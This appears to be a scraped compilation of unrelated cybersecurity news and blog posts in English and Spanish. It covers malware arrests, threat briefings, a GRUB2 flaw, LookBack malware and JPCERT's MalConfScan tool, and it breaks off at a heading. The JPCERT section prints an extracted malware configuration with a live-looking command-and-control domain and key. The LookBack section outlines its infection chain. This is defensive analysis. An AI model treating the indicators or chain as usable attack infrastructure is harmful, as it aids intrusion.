Read the original article: Expert launched Malvuln, a project to report flaws in malware The researcher John Page launched malvuln.com, the first website exclusively dedicated to the research of security flaws in malware codes. The security expert John Page (aka hyp3rlinx) launched malvuln.

Publication date: 11/20/2020

Two Romanian citizens have been arrested for allegedly running the malware encryption services, CyberSeal and Dataprotector, to avoid detection of antivirus software, and the Cyberscan service to test malware against antiviruses.

These services have been offered in the underground market since 2010 for a value of no more than $300 per license, with regular updates and customer support. They have also been used by more than 1.560 cybercriminals with different types of malware.

The police operation, coordinated by the European Cybercrime Centre (EC3), resulted in several house searches in Bucharest and Craiova, and the neutralisation of their backend infrastructure in Romania, Norway and the USA.

11/20/2020

Tags:
Cybercrime, Encryption, Incident, Internet, Malware, Other critical infrastructures

References:

ReferenciaMedioURLFechaExternoIdioma destinoIdioma contenido Romanian duo arrested for running malware encryption service to bypass antivirus softwareeuropol.europa.euhttps://www.europol.europa.eu/newsroom/news/romanian-duo-arrested-for-running-malware-encryption-service-to-bypass-antivirus-software20/11/2020sienen Romanians arrested for running underground malware servicessecurityaffairs.cohttps://securityaffairs.co/wordpress/111270/cyber-crime/police-shutdown-malware-services.html22/11/2020sienen Arrestan a dos ciudadanos Rumanos por ejecutar servicios de malwareseguridadyfirewall.clhttps://www.seguridadyfirewall.cl/2020/11/la-policia-rumana-arresto-dos.html23/11/2020sieses

twitterbitacora.png

Fecha de publicación: 20/11/2020

Dos ciudadanos rumanos han sido arrestados por, presuntamente, administrar los servicios de cifrado de malware, CyberSeal y Dataprotector, para eludir la detección de software antivirus, y el servicio Cyberscan para testear malware frente a antivirus.

Estos servicios han sido ofrecidos en el mercado clandestino desde el 2010 por un valor no superior a los 300 dólares por licencia, contando además con actualizaciones periódicas y soporte para el cliente. Asimismo, han sido utilizados por más de 1.560 ciberdelincuentes con diferentes tipos de malware.

La operación policial, coordinada por el Centro Europeo de Ciberdelincuencia (EC3), resultó en varios registros domiciliarios en Bucarest y Craiova, y en la neutralización de su infraestructura backend en Rumania, Noruega y EEUU.

20/11/2020

Etiquetas:
Cibercrimen, Cifrado, Incidente, Internet, Malware, Otras infraestructuras críticas

Referencias:

ReferenciaMedioURLFechaExternoIdioma destinoIdioma contenido Romanian duo arrested for running malware encryption service to bypass antivirus softwareeuropol.europa.euhttps://www.europol.europa.eu/newsroom/news/romanian-duo-arrested-for-running-malware-encryption-service-to-bypass-antivirus-software20/11/2020sienen Romanians arrested for running underground malware servicessecurityaffairs.cohttps://securityaffairs.co/wordpress/111270/cyber-crime/police-shutdown-malware-services.html22/11/2020sienen Arrestan a dos ciudadanos Rumanos por ejecutar servicios de malwareseguridadyfirewall.clhttps://www.seguridadyfirewall.cl/2020/11/la-policia-rumana-arresto-dos.html23/11/2020sieses

Since 2016, the NJCCIC has gathered cyber threat intelligence information to develop specific threat profiles on Android malware, ATM malware, botnets, cryptocurrency-mining malware, exploit kits, industrial control systems (ICS) malware, iOS malware, macOS malware, point-of-sale malware, ransomware, and trojans.

 

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about how threat actors are bundling Windscribe VPN installers with backdoors. Also, read about a new strain of Android malware that comes with a wide array of features allowing it to steal credentials from 226 applications.

 

 

Read on:

 

Windows Backdoor Masquerading as VPN App Installer

This article discusses findings covered in a recent blog from Trend Micro where company researchers warn that Windows users looking to install a VPN app are in danger of downloading one that’s been bundled with a backdoor. The trojanized package in this specific case is the Windows installer for Windscribe VPN and contains the Bladabindi backdoor.

The Evolution of Malicious Shell Scripts

The Unix-programming community commonly uses shell scripts as a simple way to execute multiple Linux commands within a single file. Many users do this as part of a regular operational workload manipulating files, executing programs and printing text. However, as a shell interpreter is available in every Unix machine, it is also an interesting and dynamic tool abused by malicious actors.

Microsoft Says It Detected Active Attacks Leveraging Zerologon Vulnerability

Hackers are actively exploiting the Zerologon vulnerability in real-world attacks, Microsoft’s security intelligence team said on Thursday morning. The attacks were expected to happen, according to security industry experts. Multiple versions of weaponized proof-of-concept exploit code have been published online in freely downloadable form since details about the Zerologon vulnerability were revealed on September 14 by Dutch security firm Secura BV.

Stretched and Stressed: Best Practices for Protecting Security Workers’ Mental Health

Security work is stressful under the best of circumstances, but remote work presents its own challenges. In this article, learn how savvy security leaders can best support their teams today — wherever they’re working. Trend Micro’s senior director of HR for the Americas, Bob Kedrosky, weighs in on how Trend Micro is supporting its remote workers.

Exploitable Flaws Found in Facial Recognition Devices

To gain a more nuanced understanding of the security issues present in facial recognition devices, Trend Micro analyzed the security of four different models: ZKTeco FaceDepot-7B, Hikvision DS-K1T606MF, Telpo TPS980 and Megvii Koala. Trend Micro’s case studies show how these devices can be misused by malicious attackers.

New ‘Alien’ Malware Can Steal Passwords from 226 Android Apps

Security researchers have discovered and analyzed a new strain of Android malware that comes with a wide array of features allowing it to steal credentials from 226 applications. Named Alien, this new trojan has been active since the start of the year and has been offered as a Malware-as-a-Service (MaaS) offering on underground hacking forums.

Government Software Provider Tyler Technologies Hit by Possible Ransomware Attack

Tyler Technologies, a Texas-based provider of software and services for the U.S. government, started informing customers this week of a security incident that is believed to have involved a piece of ransomware. Tyler’s website is currently unavailable and in emails sent out to customers the company said its internal phone and IT systems were accessed without authorization by an “unknown third party.”

U.S. Justice Department Charges APT41 Hackers Over Global Cyberattacks

On September 16, 2020, the United States Justice Department announced that it was charging five Chinese citizens with hacking crimes committed against over 100 institutions in the United States and abroad. The global hacking campaign went after a diverse range of targets, from video game companies and telecommunications enterprises to universities and non-profit organizations. The five individuals were reportedly connected to the hacking group known as APT41.

Phishers are Targeting Employees with Fake GDPR Compliance Reminders

Phishers are using a bogus GDPR compliance reminder to trick recipients – employees of businesses across several industry verticals – into handing over their email login credentials. In this evolving campaign, the attackers targeted mostly email addresses they could glean from company websites and, to a lesser extent, emails of people who are high in the organization’s hierarchy.

Mispadu Banking Trojan Resurfaces

Recent spam campaigns leading to the URSA/Mispadu banking trojan have been uncovered, as reported by malware analyst Pedro Tavares in a Twitter post and by Seguranca Informatica in a blog post. Mispadu malware steals credentials from users’ systems. This attack targets systems with Spanish and Portuguese as system languages.

A Blind Spot in ICS Security: The Protocol Gateway Part 3: What ICS Security Administrators Can Do

In this blog series, Trend Micro analyzes the impacts of the serious vulnerabilities detected in the protocol gateways that are essential when shifting to smart factories and discusses the security countermeasures that security administrators in those factories must take. In the final part of this series, Trend Micro describes a stealth attack method that abuses a vulnerability as well as informs readers of a vital point of security measures required for the future ICS environment.

Major Instagram App Bug Could’ve Given Hackers Remote Access to Your Phone

Check Point researchers disclosed details about a critical vulnerability in Instagram’s Android app that could have allowed remote attackers to take control over a targeted device just by sending victims a specially crafted image. The flaw lets attackers perform actions on behalf of the user within the Instagram app, including spying on victim’s private messages and deleting or posting photos from their accounts, as well as execute arbitrary code on the device.

Addressing Threats Like Ryuk via Trend Micro XDR

Ryuk has recently been one of the most noteworthy ransomware families and is perhaps the best representation of the new paradigm in ransomware attacks where malicious actors go for quality over sheer quantity. In 2019, the Trend Micro™ Managed XDR and Incident Response teams investigated an incident concerning a Trend Micro customer that was infected with the Ryuk ransomware.

What are your thoughts on the Android Instagram app bug that could allow remote access to user’s phones? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Cybercriminals Distribute Backdoor with VPN Installer and New ‘Alien’ Malware can Steal Passwords from 226 Android Apps appeared first on .

fed-up-person-laptop.jpg

Using knowledge from the ‘cyber frontline’ to improve our ‘Mitigating malware and ransomware’ guidance.

Gartner predicts the financial impact of cyber attacks resulting in fatal casualties will reach more than US$50 billion by 2023
As more physical industrial sites become connected, leaders themselves will be accountable for their security and safety 

In the age of Industry 4.0 and connected industry, we often discuss the relatively new and growing threat of cyber attacks in the context of financial damage. Ransomware, for example, can jam a steel crowbar into operations, leading to downtime, and subsequently hemorrhaging costs. 

As physical industries become connected and therefore vulnerable to attacks, they face the same risks as every other digital organization. 

READ NEXTIIoT smart factories are leaving doors open for cyber attacks

But that’s not quite the extent of it. As warehouses, factories, power plants, and other physical facilities are further laden with sensor-based predictive analytics, remote access technologies, control networks, robotics, and other operational technology (OT), system attacks can quickly lead to physical harm to people, destruction of property or environmental disasters.

Previous malware attacks have demonstrated this potential. The Triton malware was found infecting safety systems in Saudi petrochemical plants in 2017. It gave attackers the ability to remotely shut off fail-safe systems in case there was a poisonous-gas leak or a critical failure — the last layer of defense before human life was at risk. 

There have been spear-phishing attacks on members of the US energy sector. Allegedly determined to be North Korean hackers, attempts have been thwarted but could easily have led to attacks that could devastate the infrastructure of the country. As far back as 2015, a hack of Ukraine’s power grid caused a blackout affecting 200,000 people, while Kaspersky Labs estimates that over 40% of ICS computers on its watch had been attacked by malicious malware at least once in the first half of 2018. 

In the same year, it was reported that the hacking of a control system for a steel mill in Germany meant a blast furnace could not be shut, leading to “massive” damage to the plant, but no reported loss of life. 

These types of incidents on cyber-physical security (CPS) are fortunately rare but set to rapidly increase in the coming years due to a lack of security focus and spending. If business leaders don’t act, they could be held personally accountable when something goes wrong. 

Industrial robots are welding metal part in factory

Industrial robots are welding metal part in factory. Source: Shutterstock

The cyber-physical security threat

Gartner defines CPS as systems engineered to orchestrate sensing, computation, control, networking, and analytics to interact with the physical world — including humans. 

They underpin all connected IT, operational technology (OT), and Internet of Things (IoT) efforts where security considerations span both the cyber and physical worlds, such as asset-intensive, critical infrastructure, and clinical healthcare environments.

Gartner predicts that as this type of threat increases, business leaders will be caught off guard as liability for CPS incidents will “pierce the corporate veil” to personal liability for 75% of CEOs by 2024.

“Soon, CEOs won’t be able to plead ignorance or retreat behind insurance policies,” said Katell Thielemann, research vice president at Gartner. “Regulators and governments will react promptly to an increase in serious incidents resulting from failure to secure CPSs, drastically increasing rules and regulations governing them.

“In the U.S., the FBI, NSA and Cybersecurity and Infrastructure Security Agency (CISA) have already increased the frequency and details provided around threats to critical infrastructure-related systems, most of which are owned by private industry.”

Gartner predicts that the financial impact of CPS attacks resulting in fatal casualties will reach more than US$50 billion by 2023. The firm warns that, even with the actual value of human life in the equation, associated costs for organizations in terms of compensation, litigation, insurance, regulatory fines, and reputation loss will be significant. 

“Technology leaders need to help CEOs understand the risks that CPSs represent and the need to dedicate focus and budget to securing them,” said Thielemann. “The more connected CPSs are, the higher the likelihood of an incident occurring.”

YOU MIGHT LIKE

IOT

IIoT smart factories are leaving doors open for cyber attacks

With OT, smart buildings, smart cities, connected cars, and autonomous vehicles evolving, incidents in the digital world will have a much greater effect in the physical world as risks, threats and vulnerabilities now exist in a bidirectional, cyber-physical spectrum.

However, many enterprises are not aware of CPSs already deployed in their organization, either due to legacy systems connected to enterprise networks by teams outside of IT or because of new business-driven automation and modernization efforts.

The post CEOs will be held accountable for ‘killer’ malware in future, says Gartner appeared first on TechHQ.

Una severa vulnerabilidad existe en casi todas las versiones firmadas de GRUB2, el cual es usado por la mayoría de los sistemas Linux. De explotarse adecuadamente, permitiría a los atacantes comprometer el proceso de arranque del sistema, incluso si el mecanismo de verificación «Secure Boot» está activo.

La falla fue reportada por Eclypsium el 29 de julio aunque el CVE-2020-10713 asociado tiene fecha del 20 de marzo, y si bien grub2 podría relacionarse más directamente con sistemas Linux, los equipos con arranque dual (o múltiple) abre la puerta a la explotación hacia otros sistemas como Windows.

Se encontró una falla en las versiones previas a 2.06 de grub2. Un atacante puede usar la falla en GRUB 2 para secuestrar y manipular el proceso de verificación de GRUB. Esta falla también permite eludir las protecciones de arranque seguro (Secure Boot). Para poder cargar un kernel no confiable o modificado, un atacante primero necesitaría disponer de acceso al sistema, como obtener acceso físico, tener la posibilidad de alterar una red «pxe-boot» o tener acceso remoto a un sistema en la red con acceso de root. Con este acceso, un atacante podría forjar una cadena para causar un desbordamiento del búfer inyectando una carga maliciosa, que conduzca a la ejecución de código arbitrario dentro de GRUB. La mayor amenaza de esta vulnerabilidad es la confidencialidad e integridad de los datos, así como la disponibilidad del sistema.

https://cve.mitre.org/cgi-bin//cvename.cgi?name=CVE-2020-10713

Según el reporte de BleepingComputer, ha compartido la vulnerabilidad con los proveedores de sistemas operativos, los fabricantes de computadoras y los CERT/CSIRT. Se espera que hoy mismo se publiquen avisos y mitigaciones posibles de múltiples organizaciones en la industria.

Vemos el problema con baja probabilidad de ocurrencia o al menos con alta dificultad, pues como se indica en la cita del CVE, requiere condiciones especiales para llegar a explotar la vulnerabilidad. Esto no significa que nos podamos despreocupar, más bien debemos estar muy pendientes de las actualizaciones que irán llegando de los diferentes fabricantes.

The various threat intelligence stories in this iteration of the Weekly Threat Briefing discuss the following topics: APT, Data breach, Colbalt Strike, Lazarus, Misconfigured Tools, and OilRig. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity. 916000.png

Figure 1 – IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.

Trending Cyber News and Threat Intelligence

Cerberus Banking Trojan Team Breaks Up, Source Code Goes to Auction

(published: July 27, 2020)

Android banking trojan, Cerberus has been put up for sale by the malware’s developer. The trojan, which uses overlays to phish banking credentials from users, has been listed with a starting price of $50,000. The operator of Cerberus claims the purchaser will receive the source code, module code, admin panel code, along with the current customer database with a monthly profit of $10,000. The sale of Cerberus is allegedly due to the development team breaking up.Recommendation: Users should be cautious when downloading Android applications, with malicious apps occasionally bypassing Google Play Store protections. It is crucial that all permissions of an application be examined prior to download.Tags: Android Malware, Cerberus, Mobile Malware

Source Code from Dozens of Companies Leaked Online

(published: July 27, 2020)

Source code from a wide range of companies have been leaked due to misconfigured tools. Identified by Tillie Kottmann, the companies include Adobe, Disney, Lenovo, Microsoft, Motorola, Nintendo, among many others. Within the source code the developers’ names, along with hardcoded credentials have been found.Recommendation: It is crucial for your company to verify that access control is configured correctly prior to adding any sensitive data. As this story portrays, a misconfigured software can cause leaks of sensitive information, which could be used for further malicious activity, and cause significant harm to a company’s reputation.Tags: Misconfigured tools, Data breach

Dave Data Breach Affects 7.5 Million Users, Leaked on Hacker Forum

(published: July 26, 2020)

Dave, a fintech company that offers overdraft protection, has suffered a data breach. The breach occurred when threat actors gained access to third-party provider Waydev, which enabled access to user data at Dave. The database contained over seven million user records which included addresses birth dates, email addresses, names, and phone numbers. The actor who stole the database first attempted to sell the breach on a hacker forum, however, they ended up releasing the database for free on another site.Recommendation: Dave is requiring all users to do a password reset, however, users need to be aware they are still at risk if they are using the same password for other sites as well.Tags: Data breach, PII, Third party breach

Russia’s GRU Hackers Hit US Government and Energy Targets

(published: July 24, 2020)

The Federal Bureau of Investigations (FBI) and FireEye both have confirmed a series of campaigns by the Russian GRU associated APT28, aka Fancy Bear. These attacks began in December of 2018 and continued until at least May 2020. The initial vector appears to be spearphishing attacks against a number of US Government, energy, and education organizations. One confirmed victim did not find any evidence of successful phishing but did confirm that attackers had stolen multiple mailboxes from their email servers. Other initial attack vectors include password spaying and brute force. The long term motivation behind these attacks is not clear, but are likely a variation of the past motives of APT28, including US election meddling, and retaliatory attacks against the Olympic Anti-Doping Agency. The broadening of attacks to the US Energy Sector is especially troubling as APT28 is believed to have been behind previous attacks against US and Ukrainian Energy infrastructure and Industry Control Systems (ICS).Recommendation: Defense in-depth, along with well designed and regular employee training is critical to all businesses but especially important for governments and industries. Entities responsible for ICS systems need to be aware of the security issues and vulnerabilities in these systems, and they should never be connected to the internet.Tags: APT28, FancyBear, government, energy sector, spear-phishing

Chinese DJI Drones Come With Backdoor

(published: July 24, 2020)

Researchers from Synacktiv and GRIMM have released reports detailing security issues found within the DJI drone app. Developed by Chinese drone manufacturer Da Jiang Innovations, the app comes with an auto-update function that bypasses the Google Play Store, this function could be used to install malicious software on an Android device and send sensitive information directly to DJI’s servers. The app requests significant permissions (contacts, microphone, camera, location, storage, change network connectivity) and collects a user’s IMSI, IMEI and the serial number of the SIM card used, arguably the servers have almost full control of a users phone exhibiting similarities to a malware C&C server. The app also uses auto-debugging and encryption techniques to stop security researchers. DJI has disputed these claims, calling the findings “typical software concerns” and argued that the US DHS had found no evidence of suspicious data transmission.Recommendation: All applications should be carefully researched prior to installing on a personal or work machine. Applications that request additional permissions upon installation should be carefully vetted prior to allowing permissions. Additionally, all applications, especially free versions, should only be downloaded from trusted vendors.Tags: Android, drone, backdoor

Garmin Suffers Potential Ransomware Attack

(published: July 24, 2020)

Garmin’s services and applications have been experiencing outages over the previous week and reports of a ransomware attack are beginning to surface. Garmin confirmed that its website and mobile app were both down while also sending notes to its Taiwanese factories that there would be, “two days of planned maintenance.” Researchers from SentinelOne noticed that these outages appeared to correlate with a WastedLocker attack against the company, several employees likewise alleged that Garmin had suffered an attack from WastedLocker. WastedLocker is ransomware believed to have been developed by the Russian group Evil Corp, better known for their Dridex and Bitpaymer attacks. Garmin has currently not commented on a potential attack.Recommendation: Educate your employees on the risks of opening attachments from unknown senders. Anti-spam and antivirus applications provided by trusted vendors should also be employed. Emails that are received from unknown senders should be carefully avoided, and attachments from such senders should not be opened. Furthermore, it is important to have a comprehensive and tested backup solution in place, in addition to a business continuity plan for the unfortunate case of ransomware infection.MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact – T1486Tags: Garmin, ransomware, Evil Corp, WastedLocker, cybercrime,

MATA: Multi-platform Targeted Malware Framework

(published: July 22, 2020)

Security researchers from Kaspersky have identified a new malware framework called “MATA” that targets Windows, Linux, and macOS operating systems. Researchers believe the malware framework is linked to North Korea based Lazarus APT group. The framework has been used by the threat actors since April 2018 and targeted entities in Poland, Germany, Turkey, Korea, Japan, and India. The targeted industries include a software company, an e-commerce provider, and an Internet Service Provider (ISP). The actors used MATA to perform various objectives on their victims like distributing VHD ransomware and querying victim databases for acquiring customer lists. Analysis revealed that a variant of Manuscrypt malware distributed by Lazarus also shares a similar configuration structure with MATA.Recommendation: Defense-in-depth is the best way to ensure safety from APTs. Defense-in-Depth involves the layering of defense mechanisms. This can include network and end-point security, social engineering training (such as training exercises to help detect phishing emails) for staff, and robust threat intelligence capabilities.Tags: Lazarus, MATA

OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory

(published: July 22, 2020)

Palo Alto’s Unit42 discovered a variant of an OilRig-associated tool we call RDAT using a novel email-based command and control (C2) channel that relied on a technique known as steganography to hide commands and data within bitmap images attached to emails.Recommendation: Defense-in-depth is the best way to ensure safety from APTs. Defense-in-Depth involves the layering of defense mechanisms. This can include network and end-point security, social engineering training (such as training exercises to help detect phishing emails) for staff, and robust threat intelligence capabilities.Tags: OilRig, Middle East, Email, C2

Chinese APT Targets India and Hong Kong with Updated MgBot

(published: July 21, 2020)

Researchers from Malwarebytes have released a report detailing the targeting of Indian and Hong Kong entities by an unnamed Chinese APT group. A spearphishing campaign spoofing as an email from the Indian Government Information Security Center was observed targeting Indian government personnel. Once the attached .rar file was downloaded, it would inject a Cobalt Strike variant into the system. Other lure documents themed around Hong Kong immigration to the UK were discovered dropping an updated MgBot loader before injecting Remote Access Trojan (RAT) through the AppMgmt Service on Windows. The RAT’s strings are either obfuscated or use XOR encoding making analysis difficult. The targeting by a Chinese APT is likely due to the current climate between China and India as well as the political tensions in Hong Kong. Malwarebytes believes the actor shares TTPs with well-known Chinese groups such as Rancor, KeyBoy, and APT40; while still not offering attribution, the analysts believe this APT group has been active since 2014 continuously using variants of MgBot throughout.Recommendation: Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from APTs, including a focus on both network and host-based security. Prevention and detection capabilities should also be in place. Furthermore, all employees should be educated on the risks of spearphishing and how to identify such attempts.MITRE ATT&CK: [MITRE PRE-ATT&CK] Spearphishing for Information – T1397 | [MITRE ATT&CK] Access Token Manipulation – T1134 | [MITRE ATT&CK] Standard Application Layer Protocol – T1071 | [MITRE ATT&CK] BITS Jobs – T1197 | [MITRE ATT&CK] Command-Line Interface – T1059 | [MITRE ATT&CK] Data from Local System – T1005 | [MITRE ATT&CK] Exploitation for Privilege Escalation – T1068 | [MITRE ATT&CK] Network Service Scanning – T1046 | [MITRE ATT&CK] Obfuscated Files or Information – T1027Tags: China, APT, MgBot, Cobalt Strike, India, Hong Kong, spearphishing, lure

Golden Chickens: Evolution Of The MaaS

(published: July 20, 2020)

Researchers from QuoIntelligence observed four new attacks utilizing the tools from e-crime group Golden Chickens who provide Malware-as-a-Service (MaaS) throughout March and April. Researchers attributed each attack with confidence varying from low to moderate to groups GC05, GC06.tmp, and FIN6. During the analysis, it was found that the Golden Chickens group has updated its tools such as TerraLoader, more_eggs, and VenomLNK with new features that incorporate anti-analysis techniques, new string obfuscation and brute force implementation. Golden Chickens MaaS remains as a preferred service provider for top-tier e-crime groups such as FIN6 and Cobalt Group.Recommendation: Financially themed malspam emails are a common tactic among threat actors, therefore, it is crucial that your employees are aware of their financial institutions’ policies regarding electron communication. If a user is concerned due to the scare tactics often used in such emails, they should contact their financial institution via legitimate email or another form of communication. Requests to open a document in a sense of urgency and poor grammar are often indicative of malspam or phishing attacks. Said emails should be properly avoided and reported to the appropriate personnel.MITRE ATT&CK: [MITRE ATT&CK] Regsvr32 – T1117 | [MITRE ATT&CK] Code Signing – T1116 | [MITRE ATT&CK] Obfuscated Files or Information – T1027 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information – T1140 | [MITRE ATT&CK] Scheduled Task – T1053 | [MITRE ATT&CK] System Information Discovery – T1082 | [MITRE ATT&CK] System Network Configuration Discovery – T1016 | [MITRE ATT&CK] System Owner/User Discovery – T1033 | [MITRE ATT&CK] Remote File Copy – T1105 | [MITRE ATT&CK] Commonly Used Port – T1043 | [MITRE ATT&CK] Standard Application Layer Protocol – T1071 | [MITRE ATT&CK] Standard Cryptographic Protocol – T1032 | [MITRE ATT&CK] Exfiltration Over Command and Control Channel – T1041 | [MITRE ATT&CK] User Execution – T1204 | [MITRE ATT&CK] Command-Line Interface – T1059 | [MITRE ATT&CK] CMSTP – T1191Tags: Terra loader, Golden chickens

Here’s what’s changed in the NCSC’s guidance on mitigating malware and ransomware.

On August 1, security researchers at Proofpoint reported the details of a spearphishing campaign targeting three different United States utility companies using a malware called “LookBack.” The spearphishing emails, sent between July 19 and July 25, contained a malicious Microsoft Word attachment that installed a Remote Access Trojan (RAT) capable of performing activities like deleting files, taking screenshots, rebooting machines, and then deleting itself from an infected network.

While Prooftpoint was able to confirm the presence of LookBack malware at three companies, it is likely that the malware has infected other organizations as well. The emails used in the spearphishing campaign falsely appeared to be from the National Council of Examiners for Engineering and Surveying (NCEES), an American nonprofit organization that handles professional licensing for engineers and surveyors. Even fraudulently using the NCEES logo, the emails included Word documents embedded with malicious micros that, once opened, installed and ran the never-before-seen RAT.

Researchers told Threatpost that the emails were blocked before they could infect the unnamed utility companies.

How LookBack Works

According to the report by Proofpoint, LookBack is a RAT that relies on a proxy communication tool to relay data from the infected host to a command-and-control server (C2). The malware can view process, system and file data; delete files; take screenshots; move and click the infected system’s mouse; reboot machines; and delete itself from an infected host.

Researchers said that the LookBack spearphishing campaign used tactics once used by known APT adversaries targeting Japanese corporations in 2018 – which highlights the rapidly evolving nature of malware and its use by nation-state actors.

The Microsoft Word document attached to the phishing emails contains a VBA macro that drops three different Privacy Enhanced Mail (PEM) files when executed. Certutil.exe is then dropped to decode PEM files, which are later restored to their true extensions using essentuti.exe. The files then impersonate the name of an open-source binary used by common tools like Notepad++, which contains the C2 configuration. Finally, the macro runs GUP.exe and libcurl.dll to execute the LookBack malware. Once executed, LookBack can send and receive numerous commands, such as Find files, Read files, Delete files, Write to files, Start services, and more.

Has Your Organization Been Exposed to LookBack? Here’s How to Detect It.

Due to the nature of the threat, it’s important to have multiple controls in place to detect the activities related. This includes continuous security awareness training for employees and personnel to help them better identify fake and malicious emails. But beyond SPAM filters and firewalls, Nozomi Networks Labs recommends the use of both anomaly detection technologies to identify unusual behavior, and the use of traditional threat detection capabilities to provide additional context around suspicious actors related to known threats.

Within 24 hours of the announcement of this attack, the Nozomi Networks Labs team added new rules and signatures to the OT ThreatFeed to help detect LookBack in your environment. This means that alerts will now be triggered for suspicious activity related to the known threat, LookBack, so that you can detect and remediate quickly. For customers using OT ThreatFeed, please make sure that your systems are running the latest version (from August 2, 2019) to enable these new rules.

With cyberthreats against utilities continuing to rise, LookBack is just another reminder that there’s still much work to be done as utility companies continue to strengthen their cyber security.

REGISTER FOR THE WEBINAR
How to Detect LookBack Malware

Tuesday, August 16th, 2019
9:00 AM PDT

REGISTER NOW

Related Links

Proofpoint Blog: LookBack Malware Targets the United States Utilities Sector with Phishing Attacks
SecurityWeek Article: New LookBack Malware Used in Attacks Against U.S. Utilities Sector
Threatpost Article: Nation-State APTs Target U.S. Utilities With Dangerous Malware
Blog: IEC 62351 Standards for Securing Power System Communications
Blog: Advancing IEC Standards for Power Grid Cyber Security
Webpage: Real-time Visibility and Cyber Security for Electric Utilities
Webpage: Mitigating ICS Cyber Incidents
Webpage: Nozomi Network Labs
Webpage: OT ThreatFeed

The post What You Need to Know About LookBack Malware & How to Detect It appeared first on Nozomi Networks.

In malware analysis, extracting the configuration is an important step. Malware configuration contains various types of information which provides a lot of clues in incident handling, for example communication details with other hosts and techniques to perpetuates itself. This time, we will introduce a plugin “MalConfScan with Cuckoo” that automatically extracts malware configuration using MalConfScan (See the previous article) and Cuckoo Sandbox (hereafter “Cuckoo”).
This plugin is available on GitHub. Feel free to download from the webpage below:

   JPCERTCC/MalConfScan – GitHub
   https://github.com/JPCERTCC/MalConfScan-with-Cuckoo

About MalConfScan with Cuckoo

“MalConfScan with Cuckoo” is a plugin for Cuckoo, which is an open source sandbox system for dynamic malware analysis. By adding this plugin to Cuckoo, MalConfScan runs on Cuckoo, enabling automatic extraction of malware configuration . Figure 1 shows Cuckoo’s behaviour where “MalConfScan with Cuckoo” is installed.

Figure 1:Behaviour of MalConfScan with CuckooFigure 1:Behaviour of “MalConfScan with Cuckoo”

“MalConfScan with Cuckoo” runs malware on the host machine to extract configuration. When malware is registered on Cuckoo and executed on the host machine, a memory image will be dumped, from which MalConfScan extracts configuration of known malware. Extracted configuration will then be shown in a report. Please see the previous article or the following page for the list of malware that this tool supports.

   JPCERTCC/MalConfScan – GitHub
   https://github.com/JPCERTCC/MalConfScan/

Instruction and report example

First, upload malware on Cuckoo that has “MalConfScan with Cuckoo” installed by using Web GUI or commands. An official document from Cuckoo [1] provides details about the upload procedures. When the upload and analysis is completed, a report will be provided as in Figure 2.

Figure 2:Report of MalConfScan with CuckooFigure 2:Report of “MalConfScan with Cuckoo”

Figure 2 shows the configuration of malware Himawari, a variant of RedLeaves which is used in targeted attacks. It is a kind of bot, and the configuration contains C&C server, destination port, protocol, encryption key etc. In this way, “MalConfScan with Cuckoo” can easily extract configuration for known malware.
Additionally, the results can also be obtained in JSON format. report.json records the following data:

“malconfscan”: {
“data”: [
{
“malconf”: [
[
{“Server1”: “diamond.ninth.biz”},
{“Server2”: “diamond.ninth.biz”},
{“Server3”: “diamond.ninth.biz”},
{“Server4”: “diamond.ninth.biz”},
{“Port”: “443”},
{“Mode”: “TCP and HTTP”},
{“ID”: “2017-11-28-MACRO”},
{“Mutex”: “Q34894iq”},
{“Key”: “usotsuki”},
{“UserAgent”: “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)”},
{“Proxy server”: “”},
{“Proxy username”: “”},
{“Proxy password”: “”}
] ],
“vad_base_addr”: “0x04521984”,
“process_name”: “iexplore.exe”,
“process_id”: “2248”,
“malware_name”: “Himawari”,
“size”: “0x00815104”
}
],
},

How to install

The following steps are required before installing “MalConfScan with Cuckoo”:

Install MalConfScan
Apply patches for Cuckoo
Change configuration of Cuckoo

For more information about how to install the tool, please see our wiki on the GitHub:

   MalConfScan-with-Cuckoo Wiki – GitHub
   https://github.com/JPCERTCC/MalConfScan-with-Cuckoo/wiki

Ubuntu 18.04
Python 2.7.16
Cuckoo 2.0.6
Volatility 2.6

A blog article by @soji256 explains procedures to install “MalConfScan with Cuckoo”, which can be a good reference.

   Installing the MalConfScan with Cuckoo to Analyze Emotet – Medium
   https://medium.com/@soji256/build-a-malconfscan-with-cuckoo-environment-to-analyze-emotet-ff0c4c589afe

In closing

This plugin enables extracting configuration of known malware from sandbox. Even in case where malware has anti-VM or anti-sandbox function, we can still extract the configuration by spoofing some environmental information.
We will present the details of “MalConfScan” and “MalConfScan with Cuckoo” at the coming Black Hat USA 2019 Arsenal [3]. Feel free to stop by if you are attending Blackhat USA 2019, and we look forward to having active discussion and feedback from analysts.

Tomoaki Tani(Translated by Yukako Uchida)

[1] Cuckoo Docs – Submit an Analysis https://cuckoo.sh/docs/usage/submit.html

[2] “Abnormal Encryption of Himawari” – Japan Security Analyst Conference [Japanese] https://www.jpcert.or.jp/present/2018/JSAC2018_01_nakatsuru.pdf

[3] MalConfScan with Cuckoo: Automatic Malware Configuration Data Extraction and Memory Forensic – Black Hat USA 2019 https://www.blackhat.com/us-19/arsenal/schedule/index.html#malconfscan-with-cuckoo-automatic-malware-configuration-data-extraction-and-memory-forensic-16914

Every day, new types of malware are discovered. However, many of them are actually variants of existing malware – they share most part of the code and there is a slight difference in configuration such as C&C servers. This indicates that malware analysis is almost complete as long as the configuration is extracted from malware.
In this article, we would like to introduce details of “MalConfScan”, a tool to extract malware configuration, developed by JPCERT/CC. This tool is available on GitHub. Feel free to download from the webpage below:

JPCERTCC/MalConfScan – GitHub https://github.com/JPCERTCC/MalConfScan

Read the Wiki to learn how to install the tool:
MalConfScan wiki – GitHub https://github.com/JPCERTCC/MalConfScan/wiki

About MalConfScan

